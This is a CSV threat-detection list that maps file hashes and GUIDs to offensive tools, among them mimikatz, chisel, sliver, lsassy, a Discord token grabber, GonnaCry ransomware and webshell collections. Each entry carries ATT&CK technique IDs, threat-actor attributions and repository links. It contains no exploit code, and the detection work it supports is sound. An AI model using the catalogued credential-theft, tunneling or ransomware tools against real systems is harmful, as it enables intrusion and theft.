"*e6a224c7e04876dd864113178ed66d949cd74145bf813e440f9dc1d5ca7b595e*",".{0,1000}e6a224c7e04876dd864113178ed66d949cd74145bf813e440f9dc1d5ca7b595e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42194" "*e6b9b81643f27334434561f226d95e6729518eb4eb016e5a54a809fab583ef4d*",".{0,1000}e6b9b81643f27334434561f226d95e6729518eb4eb016e5a54a809fab583ef4d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - 
T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","42197" "*e6b9b81643f27334434561f226d95e6729518eb4eb016e5a54a809fab583ef4d*",".{0,1000}e6b9b81643f27334434561f226d95e6729518eb4eb016e5a54a809fab583ef4d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - 
Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","42198" "*e6be8653e8355627406150a70434675aaad1cab5dbe2116237df5bf2ff7f4b45*",".{0,1000}e6be8653e8355627406150a70434675aaad1cab5dbe2116237df5bf2ff7f4b45.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#filehash","N/A","10","","N/A","","","","42200" "*e6c2db94a0b0f667ef69e2e28e507a5e7fa629636b93506c119ccac224d74e62*",".{0,1000}e6c2db94a0b0f667ef69e2e28e507a5e7fa629636b93506c119ccac224d74e62.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42201" "*e6cab14548d77b0f7829ceb222c1b634432afd423dcbf61e160634096b82bce2*",".{0,1000}e6cab14548d77b0f7829ceb222c1b634432afd423dcbf61e160634096b82bce2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - 
KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42203" "*e6d5759ff74805dfb7e2b133493111a1a265e06d4dfcee80302048b6a173334a*",".{0,1000}e6d5759ff74805dfb7e2b133493111a1a265e06d4dfcee80302048b6a173334a.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","42204" "*e6d5c1e969b24be2c277ab70bb74169c45338967acb114a80bd2b78dfbdd2c31*",".{0,1000}e6d5c1e969b24be2c277ab70bb74169c45338967acb114a80bd2b78dfbdd2c31.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42205" "*e6da23f77e5990f4692c09e10a16f594a6c51b817bf14f5a7a96d3f109df5a2a*",".{0,1000}e6da23f77e5990f4692c09e10a16f594a6c51b817bf14f5a7a96d3f109df5a2a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42208" "*e6db508c611d834b9ad9f20bebef8507fec5f642a051ea1c6ae659b729db3c1c*",".{0,1000}e6db508c611d834b9ad9f20bebef8507fec5f642a051ea1c6ae659b729db3c1c.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py 
with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","#filehash","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","42209" "*e6dff41219521c5b2daf06379ac793df0a633b7271c8fd7c482c950eb655c182*",".{0,1000}e6dff41219521c5b2daf06379ac793df0a633b7271c8fd7c482c950eb655c182.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","42210" "*e6e05a88178633c271919ae5ea4c9633991774e2fd345ffe3052c209e2ef31d5*",".{0,1000}e6e05a88178633c271919ae5ea4c9633991774e2fd345ffe3052c209e2ef31d5.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","0","#filehash","N/A","10","1","39","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z","42211" 
"*e6e37edd595cc04216682cda2af0ef0d0580fd3c8c808fb65df547c432ee9a43*",".{0,1000}e6e37edd595cc04216682cda2af0ef0d0580fd3c8c808fb65df547c432ee9a43.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","42212" "*e6e64c0ea43db6a4e271642f3feeb0ad058c99947f14c4b05a556e4c703ac4c1*",".{0,1000}e6e64c0ea43db6a4e271642f3feeb0ad058c99947f14c4b05a556e4c703ac4c1.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","42214" "*e6e7406f1de4d3797e83f273c669296173e754769dae206c47eecd480d722f62*",".{0,1000}e6e7406f1de4d3797e83f273c669296173e754769dae206c47eecd480d722f62.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42215" "*e6e7a49af780e80542a3b0e80b9bd524bcb513fa200800f7571112be8f681abb*",".{0,1000}e6e7a49af780e80542a3b0e80b9bd524bcb513fa200800f7571112be8f681abb.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro 
formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","42216" "*e6e97a564798df361f372645253f7601dbfd3c762c4143326df41a574bc97d22*",".{0,1000}e6e97a564798df361f372645253f7601dbfd3c762c4143326df41a574bc97d22.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","42217" "*e6ea547331fd4daf15426484f27c256d680bca82d911c038ec1e1b97e1a2e14e*",".{0,1000}e6ea547331fd4daf15426484f27c256d680bca82d911c038ec1e1b97e1a2e14e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42218" "*e6ea83ec183d2123c354aa88cc300927ab7fa5a99e9201e01c85caace559a536*",".{0,1000}e6ea83ec183d2123c354aa88cc300927ab7fa5a99e9201e01c85caace559a536.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","42219" "*e6f1d80937b4c202ff8f79e77bfa5cbadc0a42975234f981b0b85dd7c8aa75cf*",".{0,1000}e6f1d80937b4c202ff8f79e77bfa5cbadc0a42975234f981b0b85dd7c8aa75cf.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42220" "*e6f2b9e53c7e38b725dd5605fb1d6527128bfe0f9a17ef305505bdc7a0771a79*",".{0,1000}e6f2b9e53c7e38b725dd5605fb1d6527128bfe0f9a17ef305505bdc7a0771a79.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","42221" "*e6feac10da1244ba8ab1bfaf6eb2a60ba4d4f016dc1fad06df3e19d1ce318c7a*",".{0,1000}e6feac10da1244ba8ab1bfaf6eb2a60ba4d4f016dc1fad06df3e19d1ce318c7a.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER 
BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","42223" "*e704bd6ebe126565b2334547aac8ef9bfcd9e3ec5ccf59b6e86d5b857610aa70*",".{0,1000}e704bd6ebe126565b2334547aac8ef9bfcd9e3ec5ccf59b6e86d5b857610aa70.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42224" "*e70c4d485153cf47b9dde0d1124b48e929e9838e241956b0062fafcd51a2f4f6*",".{0,1000}e70c4d485153cf47b9dde0d1124b48e929e9838e241956b0062fafcd51a2f4f6.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","42226" "*e71047adb4f65d8d038262c8a288feb4061ec2b2dc30a4a6d168f7c0ae8c3e23*",".{0,1000}e71047adb4f65d8d038262c8a288feb4061ec2b2dc30a4a6d168f7c0ae8c3e23.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability 
Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","42227" "*e71047e3345b665cafc213f16980ff93ff6a31ed242b32ab08884eb8298ea623*",".{0,1000}e71047e3345b665cafc213f16980ff93ff6a31ed242b32ab08884eb8298ea623.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","42228" "*e71c92b2228f78010d91f373ea3c1ed474c0b6298c3b9615edf9edb42be35abb*",".{0,1000}e71c92b2228f78010d91f373ea3c1ed474c0b6298c3b9615edf9edb42be35abb.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","42231" "*e71cda5e7c018f18aefcdfbce171cfeee7b8d556e5036d8b8f0864efc5f2156b*",".{0,1000}e71cda5e7c018f18aefcdfbce171cfeee7b8d556e5036d8b8f0864efc5f2156b.{0,1000}","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. 
you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1040 - T1003 - T1078 - T1518 - T1555","TA0006 - TA0009","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","42232" "*e71d6323db9dd7f3333d32a1fd6675108150e12a8d8769ccb8e38628a9a1aa3d*",".{0,1000}e71d6323db9dd7f3333d32a1fd6675108150e12a8d8769ccb8e38628a9a1aa3d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42233" "*e721518ae125d596d4f5148ac0e7cc08d8b9efd62ce6d874fd5958e92b50346a*",".{0,1000}e721518ae125d596d4f5148ac0e7cc08d8b9efd62ce6d874fd5958e92b50346a.{0,1000}","offensive_tool_keyword","Invoke-SessionHunter","Retrieve and display information about active user sessions on remote computers. 
No admin privileges required","T1033 - T1078 - T1110","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-SessionHunter","1","0","#filehash","N/A","7","2","183","20","2024-08-12T13:15:10Z","2023-08-13T13:22:05Z","42234" "*E731C71B-4D1B-4BE7-AA4D-EDA52AF7F256*",".{0,1000}E731C71B\-4D1B\-4BE7\-AA4D\-EDA52AF7F256.{0,1000}","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","0","#GUIDproject","N/A","N/A","2","120","16","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z","42236" "*e732db692f0686f1a3118614deda581f692219020f73e9728c9c9ead0ae50836*",".{0,1000}e732db692f0686f1a3118614deda581f692219020f73e9728c9c9ead0ae50836.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","42238" "*e734ae00fba8f7857b092bb723980990dc905c521d8f4500f74a202634190bc2*",".{0,1000}e734ae00fba8f7857b092bb723980990dc905c521d8f4500f74a202634190bc2.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42239" "*e7370f93d1d0cde622a1f8e1c04877d8463912d04d973331ad4851f04de6915a*",".{0,1000}e7370f93d1d0cde622a1f8e1c04877d8463912d04d973331ad4851f04de6915a.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. 
By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","#filehash","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","42240" "*e74146d0354389935edf4ef0dcfdf659572b1444db54f08cf0c7ade206fee3c5*",".{0,1000}e74146d0354389935edf4ef0dcfdf659572b1444db54f08cf0c7ade206fee3c5.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","42243" "*e74ae54ecb8e0faeb06dc7f1a78bbdaf9facc8540b8b6ee404061fadad0da2de*",".{0,1000}e74ae54ecb8e0faeb06dc7f1a78bbdaf9facc8540b8b6ee404061fadad0da2de.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42246" "*e74bb25e61d959049d06ff838d2147b291dcffe3e96ad0af68077cd9f50d2e82*",".{0,1000}e74bb25e61d959049d06ff838d2147b291dcffe3e96ad0af68077cd9f50d2e82.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","42247" "*e74e119f6c9d89e2419518395abc0bb44008928d3748b60ea7d02e70b757a75a*",".{0,1000}e74e119f6c9d89e2419518395abc0bb44008928d3748b60ea7d02e70b757a75a.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","42248" "*e75171190134063cc579d897bd1bd45370e3616b134398d239491c6382d3775f*",".{0,1000}e75171190134063cc579d897bd1bd45370e3616b134398d239491c6382d3775f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42250" "*e754181c7e46930dab3fab1056569be0f6fa13cbdc77a87e91ee5c4bc83f658d*",".{0,1000}e754181c7e46930dab3fab1056569be0f6fa13cbdc77a87e91ee5c4bc83f658d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42251" "*e7542c38e0b979f920fb88b59b25c3d6ae433ca145f7758938b322a71accecae*",".{0,1000}e7542c38e0b979f920fb88b59b25c3d6ae433ca145f7758938b322a71accecae.{0,1000}","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. 
as long as the password is stored by your Web Browser.","T1003 - T1555 - T1503","TA0006 - TA0007 - TA0009","N/A","Phobos - GoGoogle - 8BASE - Kimsuky - Dispossessor - Loki","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","42252" "*e75d251f639cc70aba21e621c2710dc3ee9dc15d1a677a157f83c14e9aff5f8e*",".{0,1000}e75d251f639cc70aba21e621c2710dc3ee9dc15d1a677a157f83c14e9aff5f8e.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","#filehash","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","42253" "*e7623b80e9b89fcbd900c11d16445e052c38c52cfd7bf5954a9c373679e07d5e*",".{0,1000}e7623b80e9b89fcbd900c11d16445e052c38c52cfd7bf5954a9c373679e07d5e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42254" "*e7670b3696d9013f88d2bc0f35aed4df5fa68d30fecb7aca4a33511b76c4286f*",".{0,1000}e7670b3696d9013f88d2bc0f35aed4df5fa68d30fecb7aca4a33511b76c4286f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42255" 